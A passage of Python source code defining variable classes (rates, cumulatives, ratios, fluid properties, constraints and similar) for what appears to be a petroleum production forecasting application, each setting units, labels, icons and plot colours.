        self._menu_label = 'Gas injection rate'
        self._image = ico.gas_injection_rate_16x16
        self._line_options = LineOptions(label=r'Gas Inj. Rate', colour=np.array([255., 0., 0.]) / 255.)
        self._plot_label = r'Gas Injection Rate'
        self._id = 'gas_injection_rate'
class WaterInjectionRate(RateVariable):
    """Water injection rate."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = LiquidFlowRateUnit(unit_system)
        self._menu_label = 'Water injection rate'
        self._image = ico.water_injection_rate_16x16
        self._line_options = LineOptions(label=r'Water Inj. Rate', colour=np.array([91., 155., 213.]) / 255.)
        self._plot_label = r'Water Injection Rate'
        self._id = 'water_injection_rate'
class TotalGasRate(RateVariable):
    """Total gas (produced + lift) production rate."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = GasFlowRateUnit(unit_system)
        self._menu_label = 'Total gas production rate'
        self._image = ico.total_gas_rate_16x16
        self._line_options = LineOptions(label=r'Total Gas Rate', colour=np.array([218., 119., 6.]) / 255.)
        self._plot_label = r'Total Gas Production Rate'
        self._id = 'total_gas_rate'
# ======================================================================================================================
# Cumulative Production Variables
# ======================================================================================================================
class CumulativeVariable(Variable):
    """Base class for cumulative production/injection volume variables."""
    def __init__(self):
        super().__init__()
        self._limits = (0., None)
        self._type = 'cumulatives'
        self._type_id = ID_CUMULATIVE
class OilCumulative(CumulativeVariable):
    """Cumulative oil production."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = LiquidVolumeUnit(unit_system)
        self._menu_label = 'Cumulative oil production'
        self._image = ico.oil_cum_16x16
        self._line_options = LineOptions(label=r'Oil Cum.', colour=np.array([0., 134., 61.]) / 255.)
        self._plot_label = r'Cumulative Oil Production'
        self._id = 'oil_cumulative'
class GasCumulative(CumulativeVariable):
    """Cumulative gas production."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = GasVolumeUnit(unit_system)
        self._menu_label = 'Cumulative gas production'
        self._image = ico.gas_cum_16x16
        self._line_options = LineOptions(label=r'Gas Cum.', colour=np.array([192., 0., 0.]) / 255.)
        self._plot_label = r'Cumulative Gas Production'
        self._id = 'gas_cumulative'
class WaterCumulative(CumulativeVariable):
    """Cumulative water production."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = LiquidVolumeUnit(unit_system)
        self._menu_label = 'Cumulative water production'
        self._image = ico.water_cum_16x16
        self._line_options = LineOptions(label=r'Water Cum.', colour=np.array([51., 126., 195.]) / 255.)
        self._plot_label = r'Cumulative Water Production'
        self._id = 'water_cumulative'
class LiquidCumulative(CumulativeVariable):
    """Cumulative liquid (oil + water) production."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = LiquidVolumeUnit(unit_system)
        self._menu_label = 'Cumulative liquid production'
        self._image = ico.liquid_cum_16x16
        self._line_options = LineOptions(label=r'Liquid Cum.', colour=np.array([51., 63., 79.]) / 255.)
        self._plot_label = r'Cumulative Liquid Production'
        self._id = 'liquid_cumulative'
class LiftGasCumulative(CumulativeVariable):
    """Cumulative lift gas injection."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = GasVolumeUnit(unit_system)
        self._menu_label = 'Cumulative lift gas injection'
        self._image = ico.lift_gas_cum_16x16
        self._line_options = LineOptions(label=r'Lift Gas Cum.', colour=np.array([153., 0., 153.]) / 255.)
        self._plot_label = r'Cumulative Lift Gas Injection'
        self._id = 'lift_gas_cumulative'
class GasInjectionCumulative(CumulativeVariable):
    """Cumulative gas injection."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = GasVolumeUnit(unit_system)
        self._menu_label = 'Cumulative gas injection'
        self._image = ico.gas_injection_cum_16x16
        self._line_options = LineOptions(label=r'Gas Inj. Cum.', colour=np.array([192., 0., 0.]) / 255.)
        self._plot_label = r'Cumulative Gas Injection'
        self._id = 'gas_injection_cumulative'
class WaterInjectionCumulative(CumulativeVariable):
    """Cumulative water injection."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = LiquidVolumeUnit(unit_system)
        # menu text fixed to match sibling classes (was 'Cumulative Water
        # injection' with a stray capital W)
        self._menu_label = 'Cumulative water injection'
        self._image = ico.water_injection_cum_16x16
        self._line_options = LineOptions(label=r'Water Inj. Cum.', colour=np.array([51., 126., 195.]) / 255.)
        self._plot_label = r'Cumulative Water Injection'
        self._id = 'water_injection_cumulative'
class TotalGasCumulative(CumulativeVariable):
    """Cumulative total gas (produced + lift) production."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = GasVolumeUnit(unit_system)
        self._menu_label = 'Cumulative total gas production'
        self._image = ico.total_gas_cum_16x16
        self._line_options = LineOptions(label=r'Total Gas Cum.', colour=np.array([218., 119., 6.]) / 255.)
        self._plot_label = r'Cumulative Total Gas Production'
        self._id = 'total_gas_cumulative'
# ======================================================================================================================
# Ratio Variables
# ======================================================================================================================
class FractionVariable(Variable):
    """Base class for ratio variables bounded to [0, 1] (cuts)."""
    def __init__(self):
        super().__init__()
        self._limits = (0., 1.)
        self._type = 'ratios'
        self._type_id = ID_RATIO
class RatioVariable(Variable):
    """Base class for unbounded (>= 0) ratio variables."""
    def __init__(self):
        super().__init__()
        self._limits = (0., None)
        self._type = 'ratios'
        self._type_id = ID_RATIO
class WaterCut(FractionVariable):
    """Water-cut (water fraction of produced liquid)."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = LiquidLiquidRatioUnit(unit_system)
        self._menu_label = 'Water-cut'
        self._image = ico.water_cut_16x16
        self._line_options = LineOptions(label=r'Water-cut', colour=np.array([91., 155., 213.]) / 255.)
        self._fitted_options = FittedDataOptions(colour=np.array([217., 83., 25.]) / 255.)  # TODO: NOT USED
        self._plot_label = r'Water-cut'
        self._id = 'water_cut'
class OilCut(FractionVariable):
    """Oil-cut (oil fraction of produced liquid)."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = LiquidLiquidRatioUnit(unit_system)
        self._menu_label = 'Oil-cut'
        self._image = ico.oil_cut_16x16
        self._line_options = LineOptions(label=r'Oil-cut', colour=np.array([0., 176., 80.]) / 255.)
        self._fitted_options = FittedDataOptions(colour=np.array([255., 0., 0.]) / 255.)
        self._plot_label = r'Oil-cut'
        self._id = 'oil_cut'
class GasOilRatio(RatioVariable):
    """Gas-oil ratio (GOR)."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = GasLiquidRatioUnit(unit_system)
        self._menu_label = 'Gas-oil ratio'
        self._image = ico.gas_oil_ratio_16x16
        self._line_options = LineOptions(label=r'GOR', colour=np.array([255., 0., 0.]) / 255.)
        self._fitted_options = FittedDataOptions(colour=np.array([122., 48., 160.]) / 255.)
        self._plot_label = r'Gas-Oil Ratio'
        self._id = 'gas_oil_ratio'
class WaterOilRatio(RatioVariable):
    """Water-oil ratio (WOR)."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = LiquidLiquidRatioUnit(unit_system)
        self._menu_label = 'Water-oil ratio'
        self._image = ico.water_oil_ratio_16x16
        self._line_options = LineOptions(label=r'WOR', colour=np.array([91., 155., 213.]) / 255.)
        self._plot_label = r'Water-Oil Ratio'
        self._id = 'water_oil_ratio'
class GasLiquidRatio(RatioVariable):
    """Gas-liquid ratio (GLR)."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = GasLiquidRatioUnit(unit_system)
        self._menu_label = 'Gas-liquid ratio'
        self._image = ico.gas_liquid_ratio_16x16
        self._line_options = LineOptions(label=r'GLR', colour=np.array([255., 0., 0.]) / 255.)
        self._plot_label = r'Gas-Liquid Ratio'
        self._id = 'gas_liquid_ratio'
class WaterGasRatio(RatioVariable):
    """Water-gas ratio (WGR)."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = LiquidGasRatioUnit(unit_system)
        self._menu_label = 'Water-gas ratio'
        self._image = ico.water_gas_ratio_16x16
        self._line_options = LineOptions(label=r'WGR', colour=np.array([91., 155., 213.]) / 255.)
        self._plot_label = r'Water-Gas Ratio'
        self._id = 'water_gas_ratio'
class OilGasRatio(RatioVariable):
    """Oil-gas ratio (OGR)."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = LiquidGasRatioUnit(unit_system)
        self._menu_label = 'Oil-gas ratio'
        self._image = ico.oil_gas_ratio_16x16
        # legend label fixed: was r'WGR', copy-pasted from WaterGasRatio
        self._line_options = LineOptions(label=r'OGR', colour=np.array([0., 176., 80.]) / 255.)
        self._plot_label = r'Oil-Gas Ratio'
        self._id = 'oil_gas_ratio'
class TotalGasLiquidRatio(RatioVariable):
    """Total gas-liquid ratio (TGLR), including lift gas."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = GasLiquidRatioUnit(unit_system)
        self._menu_label = 'Total gas-liquid ratio'
        self._image = ico.total_gas_liquid_ratio_16x16
        self._line_options = LineOptions(label=r'TGLR', colour=np.array([218., 119., 6.]) / 255.)
        self._plot_label = r'Total Gas-Liquid Ratio'
        self._id = 'total_gas_liquid_ratio'
# ======================================================================================================================
# Uptime Variables
# ======================================================================================================================
class UptimeVariable(Variable):
    """Base class for uptime fractions, bounded to [0, 1]."""
    def __init__(self):
        super().__init__()
        self._limits = (0., 1.)
        self._type = 'uptimes'
        self._type_id = ID_UPTIME
class ProductionUptime(UptimeVariable):
    """Fraction of time the well/facility is producing."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = FractionUnit()
        self._menu_label = 'Production uptime'
        self._image = ico.uptime_16x16
        self._line_options = LineOptions(label=r'Prod. uptime', colour=np.array([255., 217., 102.]) / 255.)
        self._plot_label = r'Production Uptime'
        self._id = 'production_uptime'
class LiftGasUptime(UptimeVariable):
    """Fraction of time lift gas is injected."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = FractionUnit()
        self._menu_label = 'Lift gas uptime'
        self._image = ico.uptime_16x16
        self._line_options = LineOptions(label=r'Lift gas uptime', colour=np.array([255., 217., 102.]) / 255.)
        self._plot_label = r'Lift Gas Uptime'
        self._id = 'lift_gas_uptime'
class GasInjectionUptime(UptimeVariable):
    """Fraction of time gas is injected."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = FractionUnit()
        self._menu_label = 'Gas inj. uptime'
        self._image = ico.uptime_16x16
        self._line_options = LineOptions(label=r'Gas inj. uptime', colour=np.array([255., 217., 102.]) / 255.)
        self._plot_label = r'Gas Injection Uptime'
        self._id = 'gas_injection_uptime'
class WaterInjectionUptime(UptimeVariable):
    """Fraction of time water is injected."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = FractionUnit()
        self._menu_label = 'Water inj. uptime'
        self._image = ico.uptime_16x16
        self._line_options = LineOptions(label=r'Water inj. uptime', colour=np.array([255., 217., 102.]) / 255.)
        self._plot_label = r'Water Injection Uptime'
        self._id = 'water_injection_uptime'
# ======================================================================================================================
# Summary variables (for use on frames)
# ======================================================================================================================
class SummaryFunction(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Function'
self._choices = ('Point', 'Sum', 'Average')
self._choice_images = (ico.specific_point_16x16, ico.specific_point_16x16, ico.specific_point_16x16)
self._pytype = tuple
self._tooltip = 'Function that reduces a temporal production profile to a scalar.'
class SummaryPoint(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Point'
self._choices = ('First', 'Last', 'Date', 'Time')
self._choice_images = (ico.first_point_16x16, ico.last_point_16x16, ico.dates_16x16, ico.time_16x16)
self._pytype = tuple
self._tooltip = 'The specific summary point of the production profile.'
class SummaryPointDate(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Date'
self._pytype = date
self._tooltip = 'Date at which to extract summary point.'
class SummaryPointTime(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._unit = 'years'
self._frame_label = 'Time'
self._pytype = float
self._tooltip = 'Time at which to extract summary point.'
class SummaryIcon(Variable):
def __init__(self, unit_system=None):
super().__init__()
self._frame_label = 'Icon'
self._choices = ('Oil rate', 'Gas rate', 'Water rate', 'Liquid rate', 'Lift gas rate', 'Gas injection rate',
'Water injection rate', 'Total gas rate', 'Oil cumulative', 'Gas cumulative',
'Water cumulative', 'Liquid cumulative', 'Lift gas cumulative', 'Gas injection cumulative',
'Water injection cumulative', 'Total gas cumulative', 'Length', 'HCFT', 'HCPV', 'Permeability')
self._choice_images = (ico.oil_rate_16x16, ico.gas_rate_16x16, ico.water_rate_16x16,
ico.liquid_rate_16x16, ico.lift_gas_rate_16x16, ico.gas_injection_rate_16x16,
ico.water_injection_rate_16x16, ico.total_gas_rate_16x16,
ico.oil_cum_16x16, ico.gas_cum_16x16, ico.water_cum_16x16,
ico.liquid_cum_16x16, ico.lift_gas_cum_16x16, ico.gas_injection_cum_16x16,
ico.water_injection_cum_16x16, ico.total_gas_cum_16x16,
ico.completion_16x16, ico.HCFT_16x16, ico.HCPV_16x16, ico.permeability_16x16)
self._client_data_map = {i: bitmap for i, bitmap in enumerate(self._choice_images)}
self._pytype = tuple
class HistogramFrequency(Variable):
    """Y-axis (count) variable for histogram plots; non-negative, unitless amount."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = AmountUnit()
        self._plot_label = 'Frequency'
        self._legend = 'Frequency'
        self._limits = (0., None)
# ======================================================================================================================
# Concession Variables
# ======================================================================================================================
class License(Variable):
    """Concession license date variable (stored under type 'concessions')."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'License'
        self._pytype = date
        self._type = 'concessions'
        self._id = 'license'
# ======================================================================================================================
# Plateau Variables
# ======================================================================================================================
class PlateauVariable(Variable):
    """Base class for plateau-target variables: non-negative floats of type 'plateaus'."""
    def __init__(self):
        super().__init__()
        self._limits = (0., None)
        self._round_off = 1
        self._pytype = float
        self._type = 'plateaus'
class TargetOilPlateau(PlateauVariable):
    """Target oil plateau rate used as a prediction constraint."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = LiquidFlowRateUnit(unit_system)
        self._frame_label = 'Target oil'
        self._menu_label = 'Target oil plateau'
        self._image = ico.well_spacing_16x16
        self._plot_label = r'Target Oil Plateau'
        self._legend = r'Oil Plateau'
        self._tooltip = 'Target oil plateau used as constraint in prediction.'
        self._id = 'target_oil_plateau'
class TargetGasPlateau(PlateauVariable):
    """Target gas plateau rate used as a prediction constraint."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = GasFlowRateUnit(unit_system)
        self._frame_label = 'Target gas'
        self._menu_label = 'Target gas plateau'
        self._image = ico.well_spacing_16x16
        self._plot_label = r'Target Gas Plateau'
        self._legend = r'Gas Plateau'
        self._tooltip = 'Target gas plateau used as constraint in prediction.'
        self._id = 'target_gas_plateau'
# ======================================================================================================================
# Well Variables
# ======================================================================================================================
class ProductionPhase(Variable):
    """Primary produced phase selector (Oil or Gas), stored as an Index."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Primary phase'
        self._choices = ('Oil', 'Gas')
        self._pytype = Index
class InjectionPhase(Variable):
    """Injected phase selector (Water, Gas, or WAG), stored as an Index."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Injected phase'
        self._choices = ('Water', 'Gas', 'WAG')
        self._pytype = Index
class DevelopmentLayout(Variable):
    """Well-development layout selector (line-drive, radial, or 5-spot) used when scaling well spacing."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Layout'
        self._image = ico.well_pair_2_16x16
        self._choices = (None, 'Line-drive', 'Radial', '5-spot')
        self._choice_images = (None, ico.well_pair_2_16x16, ico.radial_pattern_16x16, ico.five_spot_16x16)
        self._tooltip = 'Scaling of well spacing is only done on\n' \
                        'wells/analogues with similar development scheme.'
        self._pytype = tuple
class WellSpacing(Variable):
    """Well spacing (length) used to scale rate/cumulative production against analogues."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = LengthUnit(unit_system)
        self._frame_label = 'Spacing'
        self._menu_label = 'Well spacing'
        self._image = ico.well_spacing_16x16
        self._limits = (0., None)
        self._plot_label = r'Well Spacing'
        self._legend = r'Spacing'
        self._tooltip = 'Used to scale the rate and cumulative production\n' \
                        'based on the ratio between the spacing of the\n' \
                        'producer and an analogue.'
        # NOTE(review): spacing is held as an int, unlike most length-like
        # variables in this file which are floats — presumably intentional.
        self._pytype = int
        self._type = 'well_spacing'
        self._id = 'spacing'
class History(Variable):
    """Import control for a historical production profile (browse-only variant)."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Import'
        self._pytype = tuple
        self._tooltip = 'Profile of historical data:\n' \
                        '- Browse: Import profile from external file.'
class HistoryFit(Variable):
    """Import control for historical data that also supports model fitting for prediction."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Import'
        self._pytype = tuple
        self._tooltip = 'Profile of historical data:\n' \
                        '- Browse: Import profile from external file\n' \
                        '- Window: Fit models to historical data for use in prediction.'
class Cultural(Variable):
    """Import control for an entity's cultural geometry (outline, trajectory, or point)."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Import'
        self._pytype = tuple
        self._tooltip = 'Cultural of the entity:\n' \
                        '- Field, Block, Reservoir, Theme, Polygon: 2D outline (x, y)\n' \
                        '- Pipeline: 2D trajectory (x, y)\n' \
                        '- Platform, Processor: Point (x, y)\n' \
                        '- Producer, Injector, Analogue: 3D trajectory (x, y, z)'
class Prediction(Variable):
    """Prediction case selector (Low / Mid / High)."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Prediction'
        self._choices = ('Low', 'Mid', 'High')
        self._choice_images = (ico.low_chart_16x16, ico.mid_chart_16x16, ico.high_chart_16x16)
        self._pytype = tuple
class ProbabilityOfOccurrence(Variable):
    """Percentage probability that the selected prediction is sampled during uncertainty modelling."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = PercentageUnit()
        self._frame_label = 'Occurrence'
        self._limits = (0., 100.)
        self._round_off = 1
        self._pytype = float
        self._tooltip = 'Probability of the currently selected prediction\n' \
                        'to be sampled during uncertainty modelling'
# ======================================================================================================================
# Pointer Variables
# ======================================================================================================================
class Analogue(Variable):
    """Pointer to an Analogue entity supplying historical data / fitted functions."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Analogue'
        self._pytype = Pointer
        self._tooltip = 'Analogue from which to historical data:\n' \
                        '- Arrow: Insert Analogue from menu\n' \
                        '- Window: Create function based on models\n' \
                        '  fitted to historical data.'
class Typecurve(Variable):
    """Pointer to the typecurve profile used for prediction."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Typecurve'
        self._pytype = Pointer
        self._tooltip = 'Profile used for prediction:\n' \
                        '- Arrow: Insert Typecurve from menu\n' \
                        '- Browse: Import profile from external file\n' \
                        '- Window: Create function based on models\n' \
                        '  fitted to historical data.'
class Scaling(Variable):
    """Pointer to a scaling evaluation that maps static parameters to scalers."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Scaling'
        self._pytype = Pointer
        self._tooltip = 'Scaling evaluation used for transforming\n' \
                        'static parameters to scalers:\n' \
                        '- Arrow: Insert Scaling from menu.'
class Scenario(Variable):
    """Pointer to a Scenario supplying entities, events and dates."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Scenario'
        self._pytype = Pointer
        self._tooltip = 'Scenario from which to gather entities, events and dates:\n' \
                        '- Arrow: Insert Scenario from menu.'
class HistorySimulation(Variable):
    """Pointer to a history simulation carried into a prediction run."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'History'
        self._pytype = Pointer
        self._tooltip = 'History simulation to carry into prediction:\n' \
                        '- Arrow: Insert History from menu.'
# ======================================================================================================================
# Fluid Variables
# ======================================================================================================================
class FluidVariable(Variable):
    """Base class for PVT fluid properties: non-negative floats rounded to 2 decimals."""
    def __init__(self):
        super().__init__()
        self._limits = (0., None)
        self._round_off = 2
        self._pytype = float
class ReservoirFluidVariable(FluidVariable):
    """Fluid property belonging to the reservoir fluid set ('res_fluids')."""
    def __init__(self):
        super().__init__()
        self._type = 'res_fluids'
class InjectionFluidVariable(FluidVariable):
    """Fluid property belonging to the injection fluid set ('inj_fluids')."""
    def __init__(self):
        super().__init__()
        self._type = 'inj_fluids'
class OilFVF(ReservoirFluidVariable):
    """Oil formation volume factor, Bo."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = LiquidVolumeRatio(unit_system)
        self._frame_label = 'Bo'
        self._menu_label = 'Oil FVF'
        self._image = ico.Bo_16x16
        self._plot_label = r'Oil FVF, $b_o$'
        self._legend = r'$b_o$'
        self._tooltip = 'Oil formation volume factor.'
        self._id = 'bo'
class GasFVF(ReservoirFluidVariable):
    """Gas formation volume factor, Bg."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = GasVolumeRatio(unit_system)
        self._frame_label = 'Bg'
        self._menu_label = 'Gas FVF'
        self._image = ico.Bg_16x16
        self._plot_label = r'Gas FVF, $b_g$'
        self._legend = r'$b_g$'
        self._tooltip = 'Gas formation volume factor.'
        self._id = 'bg'
class WaterFVF(ReservoirFluidVariable):
    """Water formation volume factor, Bw."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = LiquidVolumeRatio(unit_system)
        self._frame_label = 'Bw'
        self._menu_label = 'Water FVF'
        self._image = ico.Bw_16x16
        self._plot_label = r'Water FVF, $b_w$'
        self._legend = r'$b_w$'
        self._tooltip = 'Water formation volume factor.'
        self._id = 'bw'
class SolutionGasOilRatio(ReservoirFluidVariable):
    """Solution gas-oil ratio, Rs."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = GasLiquidRatioUnit(unit_system)
        self._frame_label = 'Rs'
        self._menu_label = 'Solution GOR'
        self._image = ico.Rs_16x16
        self._plot_label = r'Solution Gas-Oil Ratio, $R_s$'
        self._legend = r'$R_s$'
        self._tooltip = 'Solution gas-oil-ratio.'
        self._id = 'rs'
class InjectionGasFVF(InjectionFluidVariable):
    """Injection gas formation volume factor, Bg,inj."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = GasVolumeRatio(unit_system)
        self._frame_label = 'Bg inj.'
        self._menu_label = 'Gas inj. FVF'
        self._image = ico.Bg_inj_16x16
        self._plot_label = r'Injection Gas FVF, $b_{g,inj}$'
        self._legend = r'$b_{g,inj}$'
        self._tooltip = 'Injection gas formation volume factor.'
        self._id = 'bg_inj'
class InjectionWaterFVF(InjectionFluidVariable):
    """Injection water formation volume factor, Bw,inj."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = LiquidVolumeRatio(unit_system)
        self._frame_label = 'Bw inj.'
        self._menu_label = 'Water inj. FVF'
        self._image = ico.Bw_inj_16x16
        self._plot_label = r'Injection Water FVF, $b_{w,inj}$'
        self._legend = r'$b_{w,inj}$'
        self._tooltip = 'Injection water formation volume factor.'
        self._id = 'bw_inj'
# ======================================================================================================================
# Stakes Variables
# ======================================================================================================================
class Maturity(Variable):
    """Unitless maturity index in [0.5, 1.5] used for risking; low values mean low maturity."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = Unitless()
        self._frame_label = 'Maturity'
        self._menu_label = 'Maturity'
        self._image = ico.oil_cum_16x16  # TODO: Draw icon
        self._limits = (.5, 1.5)
        self._plot_label = r'Maturity'
        self._legend = r'Maturity'
        self._round_off = 2
        self._pytype = float
        self._tooltip = 'Maturity index between 0.5 to 1.5,\n' \
                        'low values indicate low maturity and vice versa.'
        self._type = 'risking'
        self._id = 'maturity'
class ProbabilityOfSuccess(Variable):
    """Percentage probability of success (PoS) used to include/exclude wells in uncertainty modelling."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = PercentageUnit()
        self._frame_label = 'PoS'
        self._menu_label = 'Probability of success'
        self._image = ico.binary_distribution_16x16
        self._limits = (0., 100.)
        self._plot_label = r'Probability of Success, PoS'
        self._legend = r'PoS'
        self._round_off = 2
        self._pytype = float
        self._tooltip = 'Probability of Success is used to include or\n' \
                        'exclude a well during uncertainty modelling.\n' \
                        'Weighted average shown for subsurface items.'
        self._type = 'risking'
        self._id = 'pos'
class STOIIP(Variable):
    """Stock tank oil initially in place (volume, type 'volumes')."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = LiquidVolumeUnit(unit_system)
        self._frame_label = 'STOIIP'
        self._menu_label = 'STOIIP'
        self._image = ico.stoiip_16x16
        self._limits = (0., None)
        self._plot_label = r'STOIIP'
        self._legend = r'STOIIP'
        self._pytype = int
        self._tooltip = 'Stock tank oil initially in place.'
        self._type = 'volumes'
        self._id = 'stoiip'
# ======================================================================================================================
# Constraint Variables
# ======================================================================================================================
class ConstraintVariable(Variable):
    """Base class for flow-constraint variables: non-negative floats of type 'constraints'."""
    def __init__(self):
        super().__init__()
        self._limits = (0., None)
        self._round_off = 2
        self._pytype = float
        self._type = 'constraints'
class OilConstraint(ConstraintVariable):
    """Maximum oil flow-rate constraint, Q_o,max."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = LiquidFlowRateUnit(unit_system)
        self._frame_label = 'Oil flow'
        self._menu_label = 'Oil flow con.'
        self._image = ico.oil_flow_constraint_16x16
        self._plot_label = r'Oil Flow Constraint, $Q_{o,max}$'
        self._legend = r'Oil Con.'
        self._tooltip = 'Oil flow constraint.'
        self._id = 'oil_constraint'
class GasConstraint(ConstraintVariable):
    """Maximum gas flow-rate constraint, Q_g,max."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = GasFlowRateUnit(unit_system)
        self._frame_label = 'Gas flow'
        self._menu_label = 'Gas flow con.'
        self._image = ico.gas_flow_constraint_16x16
        self._plot_label = r'Gas Flow Constraint, $Q_{g,max}$'
        self._legend = r'Gas Con.'
        self._tooltip = 'Gas flow constraint.'
        self._id = 'gas_constraint'
class WaterConstraint(ConstraintVariable):
    """Maximum water flow-rate constraint, Q_w,max."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = LiquidFlowRateUnit(unit_system)
        self._frame_label = 'Water flow'
        self._menu_label = 'Water flow con.'
        self._image = ico.water_flow_constraint_16x16
        self._plot_label = r'Water Flow Constraint, $Q_{w,max}$'
        self._legend = r'Water Con.'
        self._tooltip = 'Water flow constraint.'
        self._id = 'water_constraint'
class LiquidConstraint(ConstraintVariable):
    """Maximum liquid flow-rate constraint, Q_l,max."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = LiquidFlowRateUnit(unit_system)
        self._frame_label = 'Liquid flow'
        # Capitalised to match the sibling constraints
        # ('Oil flow con.', 'Gas flow con.', 'Water flow con.').
        self._menu_label = 'Liquid flow con.'
        self._image = ico.liquid_flow_constraint_16x16
        self._plot_label = r'Liquid Flow Constraint, $Q_{l,max}$'
        self._legend = r'Liquid Con.'
        self._tooltip = 'Liquid flow constraint.'
        self._id = 'liquid_constraint'
class InjectionGasConstraint(ConstraintVariable):
    """Maximum gas-injection rate constraint, Q_g,inj,max."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = GasFlowRateUnit(unit_system)
        self._frame_label = 'Gas-inj. rate'
        self._menu_label = 'Gas-inj. con.'
        self._image = ico.gas_injection_constraint_16x16
        self._plot_label = r'Gas-Injection Constraint, $Q_{g,inj,max}$'
        self._legend = r'Gas-Inj. Con.'
        self._tooltip = 'Injection gas constraint.'
        self._id = 'gas_inj_constraint'
class InjectionWaterConstraint(ConstraintVariable):
    """Maximum water-injection rate constraint, Q_w,inj,max."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = LiquidFlowRateUnit(unit_system)
        self._frame_label = 'Water-inj. rate'
        self._menu_label = 'Water-inj. con.'
        self._image = ico.water_injection_constraint_16x16
        self._plot_label = r'Water-Injection Constraint, $Q_{w,inj,max}$'
        self._legend = r'Water-Inj. Con.'
        self._tooltip = 'Injection water constraint.'
        self._id = 'water_inj_constraint'
class LiftGasConstraint(ConstraintVariable):
    """Maximum lift-gas rate constraint, Q_g,lift,max."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = GasFlowRateUnit(unit_system)
        self._frame_label = 'Gas-lift rate'
        self._menu_label = 'Gas-lift con.'
        self._image = ico.lift_gas_constraint_16x16
        self._plot_label = r'Gas-Lift Constraint, $Q_{g,lift,max}$'
        self._legend = r'Gas-Lift Con.'
        self._tooltip = 'Lift-gas constraint.'
        self._id = 'lift_gas_constraint'
# ======================================================================================================================
# Out-flowing Phase Variables
# ======================================================================================================================
class OilInflow(Variable):
    """Boolean flag: oil is fed in from the previous network node."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Oil'
        self._pytype = bool
        self._tooltip = 'Oil is fed in from the previous node.'
class GasInflow(Variable):
    """Boolean flag: total gas (reservoir gas plus lift-gas) is fed in from the previous node."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Gas'
        self._pytype = bool
        self._tooltip = 'Gas is fed in from the previous node.\n' \
                        'This is the total gas, i.e. gas from\n' \
                        'the reservoir and lift-gas.'
class WaterInflow(Variable):
    """Boolean flag: water is fed in from the previous network node."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Water'
        self._pytype = bool
        self._tooltip = 'Water is fed in from the previous node.'
class InjectionGasInflow(Variable):
    """Boolean flag: injection gas is fed in from the previous network node."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Injection Gas'
        self._pytype = bool
        self._tooltip = 'Injection gas is fed in from the previous node.'
class InjectionWaterInflow(Variable):
    """Boolean flag: injection water is fed in from the previous network node."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Injection Water'
        self._pytype = bool
        self._tooltip = 'Injection water is fed in from the previous node.'
# ======================================================================================================================
# Flow Split Variables
# ======================================================================================================================
class SplitType(Variable):
    """Selector for how phases are split between two downstream nodes."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._frame_label = 'Split type'
